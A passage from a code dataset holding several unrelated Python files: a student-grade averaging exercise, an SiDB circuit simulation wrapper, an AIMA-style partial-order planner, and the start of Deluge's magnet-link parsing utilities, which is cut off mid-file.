self.construct_id = construct_id\n self.current_call = current_call\n self.user = user\n self.date = date\n self.comment = comment\n","sub_path":"src/model/InputComment.py","file_name":"InputComment.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"210816089","text":"studentencijfers = [[95, 92, 86], [66, 75, 54], [89, 72, 100], [34, 0, 0]]\n\ndef gemiddelde_per_student(studentencijfers):\n\n antw = []\n\n for student in range(len(studentencijfers)):\n\n antw.append(sum(studentencijfers[student]) / len(studentencijfers[student]))\n\n return antw\n\n\ndef gemiddelde_van_alle_studenten(studentencijfers):\n\n antw = 0\n student_nummer = 0\n\n for student in range(len(studentencijfers)):\n antw += sum(studentencijfers[student]) / len(studentencijfers[student])\n student_nummer = student_nummer + 1\n\n antw = antw / student_nummer\n\n return antw\n\n\nprint(gemiddelde_per_student(studentencijfers))\n\nprint(gemiddelde_van_alle_studenten(studentencijfers))\n\n\n\n\n\n\n\n","sub_path":"opdrachten/les8/pe8_4.py","file_name":"pe8_4.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"447589521","text":"#############################################################################\n# UFMG - 2021 #\n# SiDB GateFinder: #\n# Framework to facilitate edition and testing of SiDB circuits #\n# #\n# Authors: Arthur Fortini and Gustavo Guedes #\n# File: wrapper.py #\n# Description: Top level file to address user modifications in a base #\n# SiDB file and facilitate simulation and anaylis of results. #\n# Please note that some parts should be edited by user and #\n# some parts are an automated flow that should not be modified #\n# #\n#############################################################################\n\nimport argparse\nimport os\nimport xml.etree.ElementTree as ET\nimport copy\nimport math\nfrom random import seed\nfrom random import randint\nimport re\nfrom datetime import datetime\nimport sys\n\n# this imports assumes that a pysimanneal directory containing __init__.py,\n# simanneal.py, and the compiled simanneal library (_simanneal.so for Linux or\n# _simanneal.pyd for Windows) are present.\n# also a src directory containing dbMap.py, inputPermuter.py e randomizer.Py\n# should be present.\n\nsys.path.append(\"../../src/\") #include source code directory\nimport logger\nfrom pysimanneal import simanneal\nfrom dbMap import Design, DBDot\nfrom randomizer import Randomizer\nfrom inputPermuter import Permuter\n\n\nseed(1)\n\ndef create_logger ():\n build_logger = logger.Logger()\n build_logger.set_error()\n return build_logger\n\ndef arg_parser():\n parser = argparse.ArgumentParser(description='Design randomizer script.')\n parser.add_argument('design', help='Design to be randomized', type=str)\n args = parser.parse_args()\n return args\n\ndef arg_check():\n if not os.path.isfile(args.design):\n log.error(f\"Could not find design file {args.design}\")\n\nlog = create_logger()\nargs = arg_parser()\narg_check()\n\n## EDIT DESIGN BELOW THIS LINE. EXAMPLES OF CLASS METHOD'S USAGE ARE PROVIDED IN src/examples ##\n## User Parameters - those should be always provided ##\n\ndesign_name = \"OR3_NoMod\"\nsim_mu = -0.28\nnumber_of_inputs = 3 # currently gateFinder only support 2 and 3 input gates\next_potential_vector = None\n\n# Creation of design, randomizer and inputPermuter is necessary for design edition and sim automation\ndesign = Design(args.design)\nrandomizer = Randomizer(design)\ninputpermuter = Permuter(design)\n\n## Design Modifications ##\n\n# WE DONT DO ANY MODIFICATIONS IN THIS EXAMPLE SINCE WE JUST WANNA PERMUTE INPUTS TO CHECK TRUTH TABLE\n\n\n\n## PLEASE DO NOT EDIT BELOW THIS LINE. THIS PIECE OF CODE IS DESTINED TO AUTOMATICALLY ##\n## HANDLE THE MODIFIED VERSION OF DESIGN AND GENERATE THE CORRECT SIMS AND OUTPUTS ##\n\nprint(\"------- GateFinder: SiDB Circuits Design Framework -------\\n\")\nprint(\"Universidade Federal de Minas Gerais - Dpto. de Ciência da Computação\\n\")\nprint(\"NanoComp Lab\")\nprint(\"Developed by Arthur Fortini and Gustavo Guedes\")\nprint(\"For more info search in the proj README file for contact information\")\nprint(\"\\n\")\nprint(\"Initializing GateFinder ....\\n\")\n\nprint(\"Automatic input permutation and simulation started at: \" + str(datetime.now()) + \"\\n\")\n\n# Saves modified version of design in cwd #\nprint(\"Saving modified version of original design.....\\n\")\ndesign.overwriteDBDots()\ndesign.save(design_name + \".sqd\")\ndesign.save(design_name + \"SIM_PROBLEM.xml\")\nbase_dir = os.getcwd()\n\n# Permutes inputs #\nprint(\"Permuting inputs.....\\n\")\nif (number_of_inputs == 2):\n inputpermuter.permute2inputs(design_name)\nelif (number_of_inputs == 3):\n inputpermuter.permute3inputs(design_name)\nelse:\n log.error(f\"Number of inputs {number_of_inputs} not supported\\n\")\n\ntt_log = open(design_name + \"_truth_table.log\", \"w\") # creates log for truth table\n\nheader = [\"-----------------------------------------------------------------------------\\n\",\n \"| UFMG - 2021 |\\n\",\n \"| SiDB GateFinder: |\\n\",\n \"| Truth Table Log |\\n\",\n \"| |\\n\",\n \"| Design: \" + design_name + \" \\n\",\n \"| Description: SimAnneal results for all possible inputs of |\\n\",\n \"| modified design. |\\n\",\n \"| Developed by: Arthur Fortini & Gustavo Guedes |\\n\",\n \"-----------------------------------------------------------------------------\\n\",\n \"\\n\",\n \"Report start:\\t\" + str(datetime.now()) + \"\\n\",\n \"\\n\",\n \"-----------------------------------------------------------------------------\\n\",\n \"INPUTS\\t\\t\\t\\t\\t\\t\\tOUTPUTS\\n\",\n \"-----------------------------------------------------------------------------\\n\"]\ntt_log.writelines(header)\n\ninput_table = []\nif (number_of_inputs == 2):\n input_table.append(\"IN0 IN1\\n\")\n input_table.append(\"--------------------\\n\")\nelif (number_of_inputs == 3):\n input_table.append(\"IN0 IN1 IN2\\n\")\n input_table.append(\"--------------------\\n\")\nelse:\n log.error(f\"Number of inputs {number_of_inputs} not supported\\n\")\n\ntt_log.writelines(input_table)\n\n# run simulations for each possibility of inputs #\n\nprint(\"Running simulations.....\\n\")\n\ndef run_simAnneal(sim_dir, ext_potential_vector = None):\n directory = \"sims\"\n path = os.path.join(directory, sim_dir)\n os.chdir(path)\n design = Design(sim_dir + \".xml\")\n randomizer = Randomizer(design)\n db_pos = []\n\n for i, DBDot in enumerate(randomizer.inputs):\n (n, m, l) = DBDot.latcoord\n db_pos.append([int(n), int(m), int(l)])\n\n for i, DBDot in enumerate(randomizer.std):\n (n, m, l) = DBDot.latcoord\n db_pos.append([int(n), int(m), int(l)])\n\n for i, DBDot in enumerate(randomizer.inPerturber):\n (n, m, l) = DBDot.latcoord\n db_pos.append([int(n), int(m), int(l)])\n\n for i, DBDot in enumerate(randomizer.outPerturber):\n (n, m, l) = DBDot.latcoord\n db_pos.append([int(n), int(m), int(l)])\n\n for i, DBDot in enumerate(randomizer.outputs):\n (n, m, l) = DBDot.latcoord\n db_pos.append([int(n), int(m), int(l)])\n\n sp = simanneal.SimParams()\n sp.mu = sim_mu\n sp.set_db_locs(db_pos)\n if (ext_potential_vector != None):\n sp.set_v_ext(ext_potential_vector)\n # sp.set_v_ext(np.zeros(len(sp.db_locs)))\n sa = simanneal.SimAnneal(sp)\n sa.invokeSimAnneal()\n results = sa.suggested_gs_results()\n return results\n\ntt_result = []\n\nif (number_of_inputs == 2):\n counter = 0\n simdir = \"\"\n inputStr = \"\"\n\n for i in range(4):\n if (counter == 0):\n simdir = design_name + \"_00\"\n inputStr = \"0\\t\\t0\\t\\t\"\n elif (counter == 1):\n simdir = design_name + \"_01\"\n inputStr = \"0\\t\\t1\\t\\t\"\n elif (counter == 2):\n simdir = design_name + \"_10\"\n inputStr = \"1\\t\\t0\\t\\t\"\n elif (counter == 3):\n simdir = design_name + \"_11\"\n inputStr = \"1\\t\\t1\\t\\t\"\n\n if (ext_potential_vector != None):\n result = run_simAnneal(simdir, ext_potential_vector)\n else:\n result = run_simAnneal(simdir)\n\n print(\"Simulation result for \" + simdir + \".xml : \")\n print(result)\n outputStr = str(result[0])\n find_output_regex = r\"[-+\\s][0-1](?=])\"\n outputRes = re.search(find_output_regex, outputStr).group(0)\n\n if (outputRes == \" 0\"):\n tt_log.write(inputStr + \"\\t\\t0\\n\")\n tt_result.append(inputStr + \"\\t\\t0\\n\")\n elif (outputRes == \"-1\"):\n tt_log.write(inputStr + \"\\t\\t1\\n\")\n tt_result.append(inputStr + \"\\t\\t1\\n\")\n elif (outputRes == \"+1\"):\n tt_log.write(inputStr + \"\\t\\tDEGENERATE \\n\")\n tt_result.append(inputStr + \"\\t\\tDEGENERATE\\n\")\n\n counter = counter+1\n os.chdir(base_dir)\n\nelif (number_of_inputs == 3):\n counter = 0\n simdir = \"\"\n inputStr = \"\"\n\n for i in range(8):\n if (counter == 0):\n simdir = design_name + \"_000\"\n inputStr = \"0\\t\\t0\\t\\t0\\t\\t\"\n elif (counter == 1):\n simdir = design_name + \"_001\"\n inputStr = \"0\\t\\t0\\t\\t1\\t\\t\"\n elif (counter == 2):\n simdir = design_name + \"_010\"\n inputStr = \"0\\t\\t1\\t\\t0\\t\\t\"\n elif (counter == 3):\n simdir = design_name + \"_011\"\n inputStr = \"0\\t\\t1\\t\\t1\\t\\t\"\n elif (counter == 4):\n simdir = design_name + \"_100\"\n inputStr = \"1\\t\\t0\\t\\t0\\t\\t\"\n elif (counter == 5):\n simdir = design_name + \"_101\"\n inputStr = \"1\\t\\t0\\t\\t1\\t\\t\"\n elif (counter == 6):\n simdir = design_name + \"_110\"\n inputStr = \"1\\t\\t1\\t\\t0\\t\\t\"\n elif (counter == 7):\n simdir = design_name + \"_111\"\n inputStr = \"1\\t\\t1\\t\\t1\\t\\t\"\n\n if (ext_potential_vector != None):\n result = run_simAnneal(simdir, ext_potential_vector)\n else:\n result = run_simAnneal(simdir)\n\n print(\"Simulation result for \" + simdir + \".xml : \")\n print(result)\n outputStr = str(result[0])\n find_output_regex = r\"[-+\\s][0-1](?=])\"\n outputRes = re.search(find_output_regex, outputStr).group(0)\n\n if (outputRes == \" 0\"):\n tt_log.write(inputStr + \"\\t\\t0\\n\")\n tt_result.append(inputStr + \"\\t\\t0\\n\")\n elif (outputRes == \"-1\"):\n tt_log.write(inputStr + \"\\t\\t1\\n\")\n tt_result.append(inputStr + \"\\t\\t1\\n\")\n elif (outputRes == \"+1\"):\n tt_log.write(inputStr + \"\\t\\tDEGENERATE \\n\")\n tt_result.append(inputStr + \"\\t\\tDEGENERATE\\n\")\n\n counter = counter+1\n os.chdir(base_dir)\n\nprint(\"Simulation ended at:\\t\\t\" + str(datetime.now()))\nprint(\"Simulation final result:\\n\")\n\nfor i, line in enumerate(header):\n print(line)\nfor i, line in enumerate(input_table):\n print(line)\nfor i, line in enumerate(tt_result):\n print(line)\n\n\n\n","sub_path":"examples/OR3/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":10678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"338284400","text":"from utils import Expr, expr\r\nfrom logic import unify\r\nimport itertools\r\nimport random\r\n\r\nclass PDDL:\r\n\r\n\tdef __init__(self, init, goals, actions):\r\n\t\tself.init = self.convert(init)\r\n\t\tself.goals = self.convert(goals)\r\n\t\tself.actions = actions\r\n\r\n\tdef convert(self, clauses):\r\n\t\tif not isinstance(clauses, Expr):\r\n\t\t\tclauses = expr(clauses)\r\n\t\ttry:\r\n\t\t\tclauses = conjuncts(clauses)\r\n\t\texcept AttributeError:\r\n\t\t\tclauses = clauses\r\n\t\treturn clauses\r\n\r\n\tdef goal_test(self):\r\n\t\treturn all(goal in self.init for goal in conjuncts(self.goals))\r\n\r\n\tdef act(self, action):\r\n\t\taction_name = action.op\r\n\t\targs = action.args\r\n\t\tlist_action = first(a for a in self.actions if a.name == action_name)\r\n\t\tif list_action is None:\r\n\t\t\traise Exception('Action {} not found'.format(action_name))\r\n\t\tif not list_action.check_precond(self.init, args):\r\n\t\t\traise Exception('Action {} pre-conditions not satisfied'.format(action))\r\n\t\tself.init = list_action(self.init, args).clauses\r\n\r\n\r\nclass Action:\r\n\r\n\tdef __init__(self, action, precond, effect):\r\n\t\tif isinstance(action, str):\r\n\t\t\taction = expr(action)\r\n\t\tself.name = action.op\r\n\t\tself.args = action.args\r\n\t\tself.precond = self.convert(precond)\r\n\t\tself.effect = self.convert(effect)\r\n\r\n\tdef __call__(self, kb, args):\r\n\t\treturn self.act(kb, args)\r\n\r\n\tdef __repr__(self):\r\n\t\treturn f'{self.__class__.__name__}({Expr(self.name, *self.args)})'\r\n\r\n\tdef convert(self, clauses):\r\n\t\tif isinstance(clauses, Expr):\r\n\t\t\tclauses = conjuncts(clauses)\r\n\t\t\tfor i in range(len(clauses)):\r\n\t\t\t\tif clauses[i].op == '~':\r\n\t\t\t\t\tclauses[i] = expr('Not' + str(clauses[i].args[0]))\r\n\r\n\t\telif isinstance(clauses, str):\r\n\t\t\tclauses = clauses.replace('~', 'Not')\r\n\t\t\tif len(clauses) > 0:\r\n\t\t\t\tclauses = expr(clauses)\r\n\r\n\t\t\ttry:\r\n\t\t\t\tclauses = conjuncts(clauses)\r\n\t\t\texcept AttributeError:\r\n\t\t\t\tpass\r\n\r\n\t\treturn clauses\r\n\r\n\tdef substitute(self, e, args):\r\n\t\tnew_args = list(e.args)\r\n\t\tfor num, x in enumerate(e.args):\r\n\t\t\tfor i, _ in enumerate(self.args):\r\n\t\t\t\tif self.args[i] == x:\r\n\t\t\t\t\tnew_args[num] = args[i]\r\n\t\treturn Expr(e.op, *new_args)\r\n\r\n\tdef check_precond(self, kb, args):\r\n\t\tif isinstance(kb, list):\r\n\t\t\tkb = FolKB(kb)\r\n\r\n\t\tfor clause in self.precond:\r\n\t\t\tif self.substitute(clause, args) not in kb.clauses:\r\n\t\t\t\treturn False\r\n\t\treturn True\r\n\r\n\tdef act(self, kb, args):\r\n\t\tif isinstance(kb, list):\r\n\t\t\tkb = FolKB(kb)\r\n\r\n\t\tif not self.check_precond(kb, args):\r\n\t\t\traise Exception('Action pre-conditions not satisfied')\r\n\t\tfor clause in self.effect:\r\n\t\t\tkb.tell(self.substitute(clause, args))\r\n\t\t\tif clause.op[:3] == 'Not':\r\n\t\t\t\tnew_clause = Expr(clause.op[3:], *clause.args)\r\n\r\n\t\t\t\tif kb.ask(self.substitute(new_clause, args)) is not False:\r\n\t\t\t\t\tkb.retract(self.substitute(new_clause, args))\r\n\t\t\telse:\r\n\t\t\t\tnew_clause = Expr('Not' + clause.op, *clause.args)\r\n\r\n\t\t\t\tif kb.ask(self.substitute(new_clause, args)) is not False:\r\n\t\t\t\t\tkb.retract(self.substitute(new_clause, args))\r\n\r\n\t\treturn kb\r\n\r\n\r\n# If we only represent partial order constraints on steps, then we have a partial order planner, which is also called a non-linear planner.\r\n# In this case, we specify a set of temporal constraints between pairs of steps of the form S1 < S2 meaning that step S1 comes before, but not necessarily immediately before step S2\r\n# Principle of least commitment: never making a choice unless required to do so. Constraint-ordering steps will be inserted only where necessary.\r\n# On the other hand, situation-space progression planners make commitments about the order of steps as they try to find a solution and therefore may make mistakes from poor guesses about the right order of steps\r\n# Plan space planning: by searching through the plan space of (partial-order) plans. Plan space planners do least commitment planning\r\n# Pseudocode\r\n'''\r\nnon-deterministic procedure PartialOrderPlanner(Gs)\r\n\tInputs\r\n\t\tGs: set of atomic propositions to achieve\r\n\tOutput:\r\n\t\tLinear plan to achieve Gs\r\n\tLocal\r\n\t\tAgenda: set of <P, A> pairs where P is an atom and A is an action\r\n\t\tActions: set of actions in the current plan\r\n\t\tConstraints: set of temporal constraints on actions\r\n\t\tCausalLinks: set of <act0, P, act1> triples\r\n\tAgenda = {<G, finish>: G E Gs}\r\n\tActions = {start, finish}\r\n\tConstraints = {start, finish}\r\n\tCausalLinks = {}\r\n\trepeat\r\n\t\tselect and remove <G, act1> from Agenda\r\n\t\teither\r\n\t\t\tchoose act0 E Actions such that act0 achieves G\r\n\t\tor\r\n\t\t\tchoose act0 E Actions such that act0 achieves G\r\n\t\t\tActions = Actions U {act0}\r\n\t\t\tConstraints = add_const(start < act0, Constraints)\r\n\t\t\tfor each CL E CausalLinks do\r\n\t\t\t\tConstraints = protect(CL, act0, Constraints)\r\n\r\n\t\t\tAgenda = Agenda U {<P, act0>: P is a precondition of act0}\r\n\r\n\t\tConstraints = add_const(act0 < act1, Constraints)\r\n\t\tCausalLinks U {<act0, G, act1>}\r\n\t\tfor each A E Actions do\r\n\t\t\tConstraints = protect(<act0, G, act1>, A, Constraints)\r\n\r\n\tuntil Agenda = {}\r\n\treturn total ordering of Actions consistent with Constraints\r\n'''\r\n# The function add_const(act0 < act1, Constraints) returns the `Constraints` formed by adding the constraint act0 < act1 to `Constraints`,\r\n# and it fails if act0 < act1 is incompatible with `Constraints`. There are many ways this function can be implemented\r\n# The function protect(<act0, G, act1>, A, Constraints) checks whether A != act0 and A != act1 and A deletes G.\r\n# If so, it returns either {A < act0} U Constraints or {act1 < A} U Constraints. This is a non-deterministic choice that is searched over.\r\n# Otherwise it returns Constraints\r\n\r\nclass PartialOrderPlanner:\r\n\r\n\tdef __init__(self, pddl):\r\n\t\tself.causal_links = []\r\n\t\tself.pddl = pddl\r\n\t\tself.initialize(self.pddl)\r\n\t\tself.expanded_actions = self.expand_actions()\r\n\r\n\tdef initialize(self, pddl):\r\n\t\t# create dummy actions\r\n\t\tself.start = Action('Start', [], pddl.init)\r\n\t\tself.finish = Action('Finish', pddl.goals, [])\r\n\t\tself.actions = set()\r\n\t\tself.actions.add(self.start)\r\n\t\tself.actions.add(self.finish)\r\n\t\tself.constraints = set()\r\n\t\tself.constraints.add((self.start, self.finish))\r\n\t\tself.agenda = set()\r\n\t\tfor precond in self.finish.precond:\r\n\t\t\tself.agenda.add((precond, self.finish))\r\n\r\n\tdef expand_actions(self, name=None):\r\n\t\tobjects = set(arg for clause in self.pddl.init for arg in clause.args)\r\n\t\texpansions = []\r\n\t\taction_list = []\r\n\t\tif name is not None:\r\n\t\t\tfor action in self.pddl.actions:\r\n\t\t\t\tif str(action.name) == name:\r\n\t\t\t\t\taction_list.append(action)\r\n\t\telse:\r\n\t\t\taction_list = self.pddl.actions\r\n\r\n\t\tfor action in action_list:\r\n\t\t\tfor permutation in itertools.permutations(objects, len(action.args)):\r\n\t\t\t\tbindings = unify(Expr(action.name, *action.args), Expr(action.name, *permutation))\r\n\t\t\t\tif bindings is not None:\r\n\t\t\t\t\tnew_args = []\r\n\t\t\t\t\tfor arg in action.args:\r\n\t\t\t\t\t\tif arg in bindings:\r\n\t\t\t\t\t\t\tnew_args.append(bindings[arg])\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tnew_args.append(arg)\r\n\t\t\t\t\tnew_expr = Expr(str(action.name), *new_args)\r\n\t\t\t\t\tnew_preconds = []\r\n\t\t\t\t\tfor precond in action.precond:\r\n\t\t\t\t\t\tnew_precond_args = []\r\n\t\t\t\t\t\tfor arg in precond.args:\r\n\t\t\t\t\t\t\tif arg in bindings:\r\n\t\t\t\t\t\t\t\tnew_precond_args.append(bindings[arg])\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tnew_precond_args.append(arg)\r\n\t\t\t\t\t\tnew_precond = Expr(str(precond.op), *new_precond_args)\r\n\t\t\t\t\t\tnew_preconds.append(new_precond)\r\n\t\t\t\t\tnew_effects = []\r\n\t\t\t\t\tfor effect in action.effect:\r\n\t\t\t\t\t\tnew_effect_args = []\r\n\t\t\t\t\t\tfor arg in effect.args:\r\n\t\t\t\t\t\t\tif arg in bindings:\r\n\t\t\t\t\t\t\t\tnew_effect_args.append(bindings[arg])\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tnew_effect_args.append(arg)\r\n\t\t\t\t\t\tnew_effect = Expr(str(effect.op), *new_effect_args)\r\n\t\t\t\t\t\tnew_effects.append(new_effect)\r\n\t\t\t\t\texpansions.append(Action(new_expr, new_preconds, new_effects))\r\n\r\n\t\treturn expansions\r\n\r\n\tdef select_precondition(self):\r\n\t\tnumber_of_ways = dict()\r\n\t\tactions_for_precondition = dict()\r\n\t\tfor element in self.agenda:\r\n\t\t\topen_precondition = element[0]\r\n\t\t\tpossible_actions = list(self.actions) + self.expanded_actions\r\n\t\t\tfor action in possible_actions:\r\n\t\t\t\tfor effect in action.effect:\r\n\t\t\t\t\tif effect == open_precondition:\r\n\t\t\t\t\t\tif open_precondition in number_of_ways:\r\n\t\t\t\t\t\t\tnumber_of_ways[open_precondition] += 1\r\n\t\t\t\t\t\t\tactions_for_precondition[open_precondition].append(action)\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tnumber_of_ways[open_precondition] = 1\r\n\t\t\t\t\t\t\tactions_for_precondition[open_precondition] = [action]\r\n\r\n\t\tnumber = sorted(number_of_ways, key=number_of_ways.__getitem__)\r\n\t\t\r\n\t\tif len(actions_for_precondition[number[0]]) == 0:\r\n\t\t\treturn None, None\r\n\r\n\t\tact1 = None\r\n\t\tfor element in self.agenda:\r\n\t\t\tif element[0] == number[0]:\r\n\t\t\t\tact1 = element[1]\r\n\t\t\t\tbreak\r\n\r\n\t\tif number[0] in self.expanded_actions:\r\n\t\t\tself.expanded_actions.remove(number[0])\r\n\r\n\t\tprint('NUMBER 0: ', number[0])\r\n\t\treturn number[0], act1, actions_for_precondition[number[0]]\r\n\r\n\tdef cyclic(self, graph):\r\n\t\tnew_graph = dict()\r\n\t\tfor element in graph:\r\n\t\t\tif element[0] in new_graph:\r\n\t\t\t\tnew_graph[element[0]].append(element[1])\r\n\t\t\telse:\r\n\t\t\t\tnew_graph[element[0]] = [element[1]]\r\n\r\n\t\tpath = set()\r\n\r\n\t\tdef visit(vertex):\r\n\t\t\tpath.add(vertex)\r\n\t\t\tfor neighbor in new_graph.get(vertex, ()):\r\n\t\t\t\tif neighbor in path or visit(neighbor):\r\n\t\t\t\t\treturn True\r\n\t\t\tpath.remove(vertex)\r\n\t\t\treturn False\r\n\r\n\t\tvalue = any(visit(v) for v in new_graph)\r\n\t\tprint('Cyclic: ', value)\r\n\t\treturn value\r\n\r\n\tdef add_const(self, constraint, constraints):\r\n\t\t# print('constraints: ', constraints)\r\n\t\tif constraint[0] == self.finish or constraint[1] == self.start:\r\n\t\t\treturn constraints\r\n\t\tnew_constraints = set(constraints)\r\n\t\tnew_constraints.add(constraint)\r\n\t\t# print('new_constraints: ', new_constraints)\r\n\t\t# print('Checking cyclicity:', self.cyclic(new_constraints))\r\n\t\tif self.cyclic(new_constraints):\r\n\t\t\treturn constraints\r\n\t\treturn new_constraints\r\n\r\n\tdef protect(self, causal_link, action, constraints):\r\n\t\tundoes_precondition = False\r\n\t\t# print('action: ', action.name, action.args)\r\n\t\tfor effect in action.effect:\r\n\t\t\tif (str(causal_link[1].op) == 'Not' + str(effect.op)) or ('Not' + str(causal_link[1].op) == str(effect.op)) and causal_link[1].args == effect.args:\r\n\t\t\t\tprint('action: ', action, '\\'s effect: ', effect, 'undoes', causal_link[1])\r\n\t\t\t\tundoes_precondition = True\r\n\r\n\t\tif action != causal_link[0] and action != causal_link[2] and undoes_precondition:\r\n\t\t\t# promotion always\r\n\t\t\t# constraints.add((action, causal_link[0]))\r\n\t\t\t# if random.randint(1, 101) > 50:\r\n\t\t\t# \tprint('Promotion')\r\n\t\t\t# \tconstraints = self.add_const((action, causal_link[0]), constraints)\r\n\t\t\t# else:\r\n\t\t\t# \tprint('Demotion')\r\n\t\t\t# \tconstraints = self.add_const((causal_link[2], action), constraints)\r\n\t\t\t# always promotion\r\n\t\t\tconstraints = self.add_const((action, causal_link[0]), constraints)\r\n\t\treturn constraints\r\n\r\n\tdef execute(self):\r\n\t\t# print('start: ', self.start)\r\n\t\t# print('finish: ', self.finish)\r\n\t\t# print('actions: ', self.actions)\r\n\t\t# print('constraints: ', self.constraints)\r\n\t\t# print('agenda: ', self.agenda)\r\n\r\n\t\t# select and remove <G, act1> from Agenda\r\n\t\tstep = 1\r\n\t\tlast_constraints = None\r\n\t\tlast_causal_links = None\r\n\r\n\t\twhile len(self.agenda) > 0 and step < 200:\r\n\t\t\tprint(f'STEP {step} ---------------------------------------------------------------')\r\n\t\t\tstep += 1\r\n\r\n\t\t\tG, act1, possible_actions = self.select_precondition()\r\n\t\t\tact0 = possible_actions[0]\r\n\t\t\t# print('act0: ', act0.name, act0.args)\r\n\t\t\t# print('G: ', G)\r\n\t\t\t# print('act1: ', act1.name, act1.args)\r\n\t\t\tself.agenda.remove((G, act1))\r\n\r\n\t\t\t# Actions = Actions U {act0}\r\n\t\t\tself.actions.add(act0)\r\n\r\n\t\t\t# Constraints = add_const(start < act0, Constraints)\r\n\t\t\tself.constraints = self.add_const((self.start, act0), self.constraints)\r\n\r\n\t\t\t# for each CL E CausalLinks do\r\n\t\t\t# \tConstraints = protect(CL, act0, Constraints)\r\n\t\t\tfor causal_link in self.causal_links:\r\n\t\t\t\tself.constraints = self.protect(causal_link, act0, self.constraints)\r\n\r\n\t\t\t# Agenda = Agenda U {<P, act0>: P is a precondition of act0}\r\n\t\t\tfor precond in act0.precond:\r\n\t\t\t\tself.agenda.add((precond, act0))\r\n\r\n\t\t\t# Constraints = add_const(act0 < act1, Constraints)\r\n\t\t\tself.constraints = self.add_const((act0, act1), self.constraints)\r\n\r\n\t\t\t# CausalLinks U {<act0, G, act1>}\r\n\t\t\tif (act0, G, act1) not in self.causal_links:\r\n\t\t\t\tself.causal_links.append((act0, G, act1))\r\n\r\n\t\t\t# for each A E Actions do\r\n\t\t\t#\tConstraints = protect(<act0, G, act1>, A, Constraints)\r\n\t\t\tfor action in self.actions:\r\n\t\t\t\tself.constraints = self.protect((act0, G, act1), action, self.constraints)\r\n\r\n\t\t\tif self.constraints == last_constraints and self.causal_links == last_causal_links:\r\n\t\t\t\tbreak\r\n\t\t\tlast_constraints = set(self.constraints)\r\n\t\t\tlast_causal_links = set(self.causal_links)\r\n\r\n\t\t\tprint('agenda: ', self.agenda)\r\n\t\t\tprint('actions: ')\r\n\t\t\tfor action in self.actions:\r\n\t\t\t\tprint(action.name, action.args)\r\n\t\t\tprint('constraints: ')\r\n\t\t\tfor constraint in self.constraints:\r\n\t\t\t\tprint(constraint[0].name, constraint[0].args, ' < ', constraint[1].name, constraint[1].args)\r\n\t\t\tfor causal_link in self.causal_links:\r\n\t\t\t\tprint('<', causal_link[0].name, causal_link[0].args, ',', causal_link[1], ',', causal_link[2].name, causal_link[2].args, '>')\r\n","sub_path":"Machine Learning/Aima/partial_order_planner_5.py","file_name":"partial_order_planner_5.py","file_ext":"py","file_size_in_byte":12993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"286286242","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2007,2008 Andrew Resch <andrewresch@gmail.com>\n#\n# This file is part of Deluge and is licensed under GNU General Public License 3.0, or later, with\n# the additional special exception to link portions of this program with the OpenSSL library.\n# See LICENSE for more details.\n#\n\n\"\"\"Common functions for various parts of Deluge to use.\"\"\"\nfrom __future__ import division, print_function, unicode_literals\n\nimport base64\nimport functools\nimport locale\nimport logging\nimport numbers\nimport os\nimport platform\nimport re\nimport subprocess\nimport sys\nimport time\n\nimport pkg_resources\n\ntry:\n from urllib.parse import unquote_plus, urljoin\n from urllib.request import pathname2url\nexcept ImportError:\n # PY2 fallback\n from urlparse import urljoin # pylint: disable=ungrouped-imports\n from urllib import pathname2url, unquote_plus # pylint: disable=ungrouped-imports\n\n\nMAGNET_SCHEME = 'magnet:?'\nXT_BTIH_PARAM = 'xt=urn:btih:'\nDN_PARAM = 'dn='\nTR_PARAM = 'tr='\n\n\ndef is_infohash(infohash):\n \"\"\"\n A check to determine if a string is a valid infohash.\n Args:\n infohash (str): The string to check.\n Returns:\n bool: True if valid infohash, False otherwise.\n \"\"\"\n return len(infohash) == 40 and infohash.isalnum()\n\n\ndef is_magnet(uri):\n \"\"\"\n A check to determine if a uri is a valid bittorrent magnet uri\n :param uri: the uri to check\n :type uri: string\n :returns: True or False\n :rtype: bool\n :Example:\n >>> is_magnet('magnet:?xt=urn:btih:SU5225URMTUEQLDXQWRB2EQWN6KLTYKN')\n True\n \"\"\"\n\n if uri.startswith(MAGNET_SCHEME) and XT_BTIH_PARAM in uri:\n return True\n return False\n\n\ndef get_magnet_info(uri):\n \"\"\"Parse torrent information from magnet link.\n Args:\n uri (str): The magnet link.\n Returns:\n dict: Information about the magnet link.\n Format of the magnet dict::\n {\n \"name\": the torrent name,\n \"info_hash\": the torrents info_hash,\n \"files_tree\": empty value for magnet links\n }\n \"\"\"\n\n tr0_param = 'tr.'\n tr0_param_regex = re.compile(\"^tr.(\\\\d+)=(\\\\S+)\")\n if not uri.startswith(MAGNET_SCHEME):\n return {}\n\n name = None\n info_hash = None\n trackers = {}\n tier = 0\n for param in uri[len(MAGNET_SCHEME):].split('&'):\n if param.startswith(XT_BTIH_PARAM):\n xt_hash = param[len(XT_BTIH_PARAM):]\n if len(xt_hash) == 32:\n try:\n info_hash = base64.b32decode(xt_hash.upper()).encode('hex')\n except TypeError as ex:\n logging.debug(\n 'Invalid base32 magnet hash: %s, %s', xt_hash, ex)\n break\n elif is_infohash(xt_hash):\n info_hash = xt_hash.lower()\n else:\n break\n elif param.startswith(DN_PARAM):\n name = unquote_plus(param[len(DN_PARAM):])\n elif param.startswith(TR_PARAM):\n tracker = unquote_plus(param[len(TR_PARAM):])\n trackers[tracker] = tier\n tier += 1\n elif param.startswith(tr0_param):\n try:\n tier, tracker = re.match(tr0_param_regex, param).groups()\n trackers[tracker] = tier\n except AttributeError:\n pass\n\n if info_hash:\n if not name:\n name = info_hash\n return {'name': name, 'info_hash': info_hash, 'files_tree': '', 'trackers': trackers}\n else:\n return {}\n\n\ndef create_magnet_uri(infohash, name=None, trackers=None):\n \"\"\"Creates a magnet uri\n Args:\n infohash (str): The info-hash of the torrent.\n name (str, optional): The name of the torrent.\n trackers 